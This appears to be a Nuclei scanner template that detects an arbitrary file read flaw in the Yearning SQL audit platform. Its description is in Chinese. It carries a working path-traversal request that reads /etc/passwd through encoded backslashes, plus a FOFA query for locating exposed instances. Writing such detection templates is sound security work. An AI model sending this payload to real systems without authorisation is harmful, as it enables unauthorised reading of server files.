id: Yearning-file-reading

info:
  name: Yearning存在任意文件读取漏洞
  author: changge
  severity: high
  description: Yearning MYSQL SQL语句审核平台。提供查询审计，SQL审核，SQL回滚，自定义工作流等多种功能。该平台存在任意文件读取漏洞
  metadata:
    fofa-query: app="Yearning"


requests:
  - raw:
      - |
        GET /front/%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
        Accept: */*
        Connection: Keep-Alive

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'root'
      - type: status
        status:
          - 200
